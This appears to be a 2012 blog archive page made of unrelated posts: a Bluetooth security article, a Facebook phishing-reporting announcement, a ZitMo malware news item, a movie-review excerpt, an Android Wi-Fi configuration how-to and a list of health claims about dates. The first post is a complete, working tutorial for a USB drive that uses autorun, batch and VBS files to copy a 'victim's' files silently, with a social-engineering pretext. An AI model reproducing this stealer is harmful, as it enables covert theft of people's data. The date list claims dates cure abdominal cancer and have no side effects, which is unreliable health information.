Archive for August, 2012

Image

In today’s article I am going to teach you something illegal but only for educational propose. This only demonstrates how you can copy files from your friend’s PC as soon as you plug in your flash drive or any removable storage media Let’s say you and your friend are preparing for an all important exam that is going to decide the course the rest of your life takes. Your friend has some important notes on his computer that he isn’t going to share with you. Your friend is a moron. You need the notes so
badly that you are willing to steal from him.

He deserves it anyway.To get the notes you can either break into his house at night, an accomplice keeps you hanging by a rope from the roof while you deliberately copy the files to your flash drive taking care not to let your feet touch the floor. Or you can walk into his room one morning and say with a feigned smile, “Hey, buddy! I have some great new music. Want it?”. Then plug your USB Flash drive into his PC to automatically copy his notes to your pen drive, secretly and silently. Copy the songs you brought to his PC to complete the act.Sneaky, isn’t it? So let us prepare such a sinister USB Flash drive.

STEP 1

Open Notepad (I recommend Notepad++) and copy-paste the following lines.

[autorun]
icon=drive.ico
open=launch.bat
action=Click OK to Run
shell\open\command=launch.bat

Save this as autorun.inf

The icon line is optional. You can change the icon to your tastes or leave it to the default icon. It’s useful for social engineering purposes like enticing the user to click a file on the drive by making it looks like a game or something.

The “action=” command is optional too but sometimes when the autorun launches it may ask the user what to open. Depending on what you put here the user will be instructed to click Ok or run the file. This code acts as a backup just in case the user is asked what to open. This is not required if you are operating the computer.

The “shell/open command” also acts as a backup in case the user clicks cancel instead of open when prompted. This code will execute when the drive letter is clicked on.

 
STEP 2

Open Notepad again and copy-paste the following lines

@echo off
:: variables
/min
SET odrive=%odrive:~0,2%
set backupcmd=xcopy /s /c /d /e /h /i /r /y
echo off
%backupcmd% “%USERPROFILE%\pictures” “%drive%\all\My pics”
%backupcmd% “%USERPROFILE%\Favorites” “%drive%\all\Favorites”
%backupcmd% “%USERPROFILE%\videos” “%drive%\all\vids”
@echo off
cls

Save this as file.bat

This file is configured to copy the contents of the current users pictures, favorites, and videos folder to the Flash drive under a folder called “all”. This is the section of the code you will need to edit depending on what you want to copy.

The first file path “%USERPROFILE%\pictures” – is the target.
The second file path “%drive%\all\My pics” – is the destination.

 

STEP 3

Open Notepad once again and copy-paste the following line.

CreateObject(“Wscript.Shell”).Run “””” & WScript.Arguments(0) & “”””, 0, False

Save this as invisible.vbs

This code runs the file.bat as a process so it does not show the CMD prompt and everything the batch file is processing.

 
STEP 4

Open Notepad one last time and copy-paste the following line.

wscript.exe \invisible.vbs file.bat

Save this as launch.bat

This batch file does two things, it looks for the invisible.vbs file in the root of the Flash drive then loads it with file.bat so file.bat is run with code from vbs file.

 

STEP 5

Copy all 4 files created in the above steps and put it on the root of the Flash drive, including the icon file if needed. Also create a folder named “all” where the contents are to be copied automatically. You can call this folder by any name, but then you need to reflect the changes you made in step 2.

This is all that needs to be done. Test the Flash drive on your own computer first before playing it out on your victim. It works flawlessly.

 

Image

Advertisements
Today, Facebook announces the launch of phish@fb.com, an email address available to the public to report phishing attempts against Facebook. Phishing is any attempt to acquire personal information, such as username, password, or financial information via impersonation or spoofing.
 Image
 
 
 
 
  By providing Facebook with reports, we can investigate and request for browser blacklisting and site takedowns where appropriate.In some cases, Facebook will be able to identify victims, and secure their accounts.
 You might ask yourself how to spot suspected phishing emails. Facebooks Partner at the Anti-Phishing Working Group have put together some helpful tips to avoid being deceived by these messages:
 
1.         Be suspicious of any email with urgent requests for login or financial information, and remember, unless the email is digitally signed, you can’t be sure it wasn’t forged or ‘spoofed’
2.       Don’t use the links in an email, instant message, or chat to get to any web page if you suspect the message might not be authentic or you don’t trust the sender, instead navigate to the website directly
 
This new reporting channel will compliment internal systems they have in place to detect phishing sites attempting to steal Facebook user login information.  The internal systems will notify faceboook team, so that they can gather information on the attack, take the phishing sites offline, and notify users.  Affected users will be prompted to change their password and provided education to better protect themselves in the future.

The rapid spread of personal productivity devices is growing unabated and with it an ever increasing growth in the presence of Bluetooth enabled devices. Like any popular technology, Bluetooth is becoming a target of opportunity for crackers. Any single business might have hundreds or thousands of Bluetooth enabled cell phones, smartphones, PDA’s, keyboards, and mice in the workplace. This growing number of wireless devices is increasing the potential for information asset compromise.

How Bluetooth works

Bluetooth is a wireless network technology defined by the IEEE 802.15 standard. Using frequency hopping to reduce interference, it operates in the 2.4 MHz band. Throughput over a Bluetooth connection is dependent on the version implemented by the device manufacturer. Maximum data rates range from 1 Mbps to 3 Mbps. Actual data rates typically fall well below these thresholds.

Initially developed in 1994 by Ericsson, Bluetooth has become the technology of choice for creating small personal networks without the need for cables. See Figure A.  

Figure A

Small personal network

Bluetooth personal area networks, also known as piconets, consist of one master and up to 7 active slave devices. A Bluetooth piconet is depicted in Figure B. An additional 255 devices can be connected to the master as long as they are in park mode.

Figure B

A Bluetooth piconet

Within a piconet, each slave is attached to the master via a physical channel. Each of these channels is divided into slots. Packets traveling between the master and the slave are placed into these slots. Physical channels are not created between slaves. All packet transfers are managed by the master device. The master sequentially polls each device to see if it requires service. The master is also responsible for synchronizing all devices to ensure consistent timing.

A device can join a piconet in one of two ways. First, a Bluetooth device can enter an inquiry state to discover other Bluetooth devices. Within this inquiry, information is provided about the types of services needed. Bluetooth devices offering one or more of the requested services, and that are within the broadcast range, will respond if in discovery mode. The process used to establish a channel between one or more of the responding devices depends on the security mode used.

In the second way, a master searches for devices within range. If one is discovered, it is automatically added to the piconet in accordance with security measures in place on one or both of the devices.

The distance over which two devices can establish a channel depends on their power classes. Table A shows the three classes and the potential connectivity range of each. Classes 1 and 2 are the most common.

Table A

Classes

Finally, two or more piconets can potentially connect to create a scatternet, as shown in Figure C.

Figure 3

A scatternet

Bluetooth Security

Bluetooth devices easily connect to each other. This was the intent when the specification was developed. Consequently, many device vendors implement Bluetooth in a manner that provides for easy connectivity while exposing the information assets of individuals and organizations to greater risk.

The Bluetooth standard specifies three Security Modes, as shown in Table 2.

Table 2

Security modes

Devices configured with Mode 1 security employ no security mechanisms. This type of connection should never be used to share sensitive information. Mode 2 security is the most flexible of the three. Once two devices establish a physical channel, business policies can be applied to applications and services to dictate the level of security required.

Not all applications or services have to use the same level of security. For example, a healthcare organization might deploy an application that shares patient information between Bluetooth devices. In such cases authentication, encryption, and authorization measures should be used. Authentication allows a device to disallow a connection and encryption protects the data traveling over an established channel. However, these same devices might share public information (i.e. business cards) that does not require secure data transfer.

The ability to use Bluetooth security measures only when necessary might help to enhance the user experience by optimizing performance. It can also limit connected devices to a subset of the services available. The use of authorization enables a service-providing device to allow a connected device to access some services but not others based on the service access rules in place.

Mode 3 security is the most secure but lacks the flexibility of Mode 2. When establishing a channel using Mode 3 restrictions, authentication and encryption negotiation begins before the establishment of the channel is complete. All information flowing between the devices is encrypted. Authorization is not required because it is typically assumed that two devices connected over a Mode 3 enabled channel should be able to access all available data and services available in each device.

Mode 2 and 3 security levels are implemented through a process known as pairing. The details of secure Bluetooth pairing are outside the scope of this article, but you can find more information on this topic in NIST SP 800-48.

Bluetooth vulnerabilities

Although security is available for Bluetooth, many smartphone, cell phone, and other device vendors choose to use Mode 1 security. In addition a large number of devices are set to discovery/visible-to-all mode, which enables them to respond to all service inquiries. This allows users to quickly experience the benefits of using a piconet without the hassles of worrying about security configurations.

In a June 2006 article entitled “Bluetooth: London 2006“, Alexander Gostev described the results of research conducted by Kaspersky Lab on the actual vulnerability of Bluetooth devices in public places. The Kaspersky team visited InfoSecurity 2006 in London with the purpose of detecting as many Bluetooth devices as possible.

According to Gostev, they detected more than 1000 Bluetooth devices in visible-to-all mode. In other words, these 1000 devices were ready and waiting for any other device to establish a connection. Lacking any other mechanisms to prevent unwanted access, they were exposed to data leakage or the rapid spread of malware. Devices detected included the following:

  • Cell phones
  • Smartphones
  • Laptop computers
  • Cordless phones
  • PDA’s
  • Desktop computers
  • Other uncategorized devices

Failing to turn off discover/visible-to-all mode or to implement at least Mode 2 level security might expose an organization’s information in the following ways:

  • Sensitive data is available for browsing
  • An attacker can use a compromised telephone to make calls
  • DoS attacks can be launched against the compromised device
  • Address lists can be downloaded
  • Malware can be installed for later infection of other devices, including network attached systems
  • An attacker can install malware with the intent to gain ongoing control of the device

Protecting Bluetooth networks

There are a variety of ways for an organization to protect its Bluetooth devices from compromise. As with all security challenges the first step is to educate the workforce. Every employee should know about the right way and the wrong way to use Bluetooth. Also, policies should be in place that govern the use of business-owned and privately-owned wireless devices. At a minimum the policies should address the following:

  • Configure devices so that the user has to approve any connection request
  • Turn off Bluetooth when not in use
  • Do not operate Bluetooth devices in Mode 1; ensure discovery mode is enabled only when necessary to pair trusted devices
  • Trusted devices should be paired in safe environments out of the reach of malicious elements
  • Minimize the range of devices to the shortest reasonable distance
  • Consider installing anti-virus and personal firewall software on each Bluetooth device

Closely managed

Bluetooth is a great addition to the business productivity toolbox. However, it must be understood by the technical team and its deployment should be closely managed. Failure to purchase devices that support the right security measures, or to minimize exposure due to unmanaged device discovery, puts your enterprise data at risk.

 

This article is also available as a TechRepublic download.

Source: http://www.techrepublic.com/article/secure-your-bluetooth-wireless-networks-and-protect-your-data/6139987

Image

1) Dates are free from cholesterol and contain very low fat. Dates are rich in vitamins and minerals.

2) They are rich source of protein, dietary fiber and rich in vitamin B1, B2, B3 and B5 along with vitamin A1 and C.

3)It helps improve the digestive system as it contains soluble and insoluble fibers and different kinds of amino acids.

4) Dates are great energy boosters as they contain natural sugars like glucose, sucrose and fructose. To get more advantage add dates to milk and make it a very nutritious snack.

5)Dates are very low in calories and are extremely suitable for health conscious people.

6) Dates are rich in potassium and reduced in sodium. This helps regulate a healthy nervous system. Researches have revealed the fact that potassium intake up to a certain extent can reduce risk of stroke.

7) Dates also help in lowering of the LDL cholesterol.

8) Dates have high iron content and are very useful in treating anemia. The patients can eat many dates for better advantages.

9) Dates also have fluorine that slows down the process of tooth decay.

10) It helps people suffering from constipation. Soak dates overnight and take it along with water to have added advantage.

11) Dates help in weight gain and are beneficial for those who suffer from over slimming problem.

12) Dates are excellent for alcoholic intoxication.Cures abdominal cancer.

13) It also helps in improving eye sight and helps in curing night blindness as well.

“The best thing is that it does not have any side effect on the body and is completely natural as well as it works better than medicine.”

Image

 

Cut The Crap Movie Reviews

VERDICT:
6/10 Deadbeat Summers

One more reason why it pays to listen to nine-year-olds.

Diary of a Wimpy Kid: Dog Days is about a nerdy seventh-grader whose plans to play video games all summer are ruined when his dad catches him lying about his daily activities, unplugs the TV, and tries to get him (dun-dun-DUUUUN!) an internship at the office. Rather than spend his days in a cubicle, and at the risk of being sent to a dreaded prep school, the kid thinks fast and lies about getting a job at his friend’s country club. Luckily, his dad buys it, and so our soon-to-be eighth grader tries to make the most out of his vacation by hanging out with best friend, avoiding his older brother, and working his way out of the friend zone with the girl of his dreams.

Believe it or not, I’m pretty unfamiliar with…

View original post 944 more words

Image

 

Security researchers at Kaspersky Lab have discovered five new samples of the ZeuS-in-the-Mobile (ZitMo) malware package, targeting Android and BlackBerry devices.

Zitmo (Zeus in the mobile) is the name given to the mobile versions of Zeus, and it’s been around for a couple of years already, mostly infecting Android phones. The Zitmo variant has reportedly been operating for at least two years targeting Android phones by masquerading as banking security application or security add-on.

ZitMo gets hold of banking information by intercepting all text messages and passing them on to attackers’ own devices. It gets onto devices inside malicious applications, which users are duped into downloading. In this case, the malicious app was posing as security software called ‘Zertifikat’.

Once installed, the packages forward all incoming SMS messages to one of two command and control numbers located in Sweden, with the aim of snaring secure codes and other data. Kaspersky found mobile users in Spain, Italy and Germany were targeted by these fresh variants, with two command and control (C&C) numbers found on Sweden’s Tele2 operator.

“The analysis of new Blackberry ZitMo files showed that there are no major changes. Virus writers finally fixed grammar mistake in the ‘App Instaled OK’ phrase, which is sent via SMS to C&C cell phone number when smartphone has been infected. Instead of ‘BLOCK ON’ or ‘BLOCK OFF’ commands (blocking or unblocking all incoming and outgoing calls) now there are ‘BLOCK’ and ‘UNBLOCK’ commands. Other commands which are received via SMS remain the same.” Denis Maslennikov, a researcher at Kaspersky Lab.

The tactic is designed to help the criminals circumvent the out-of-band authentication systems used by many European banks, by hijacking the one-time password authentication password sent via SMS.

Earlier this year, Kaspersky warned of a set of malicious Android applications posing as security software. Zeus was sitting behind those apps, ready to siphon off text messages.

Via Hacker News..

For More visit~~ http://thehackernews.com/

Image

Let’s break it down:

(note: the following process will only work on a rooted device)

  1. Get the wpa_supplicant.conf from here. Note that I myself got it from the xda-developers website but as I couldn’t recall the exact page I decided to upload my own copy of it to post here. I didn’t create it and all credit goes to the original creator whose name I would desperately like to recall but can’t.
  2. Get File Expert from here. The reason I linked to an apk and not to the market should be obvious. In case you can’t access the internet on your phone, this is the only way to get it. It’s a free app so don’t worry about piracy. Still, I suggest once you have a working network, update your app to the latest version.
  3. Install File Expert on your Android phone and copy the wpa_supplicant.conf file to your SD card.
  4. Run File Expert and grant it Super User Access whenever it asks.
  5. Browse to /system/etc/wifi/wpa_supplicant.conf on your phone and copy the original wpa_supplicant.conf file to a safe location so you can restore it if needed.
  6. Copy the downloaded wpa_supplicant.conf file to the aforementioned location, replacing the original.
  7. Restart your phone.

And now, if you have done everything properly, then your phone should be able to detect and use ad-hoc networks. It can be glitchy from time to time, but it’s currently the best solution I’ve been able to track down. If anyone has found a better method, please do leave a comment about it.

Hope I was useful.

Note: All the credit for the actual coding and modification process goes to the wizards at xda-developers. It’s a great site and I urge you to check it out for all your smartphone developments and hacking needs. Cheers.

Image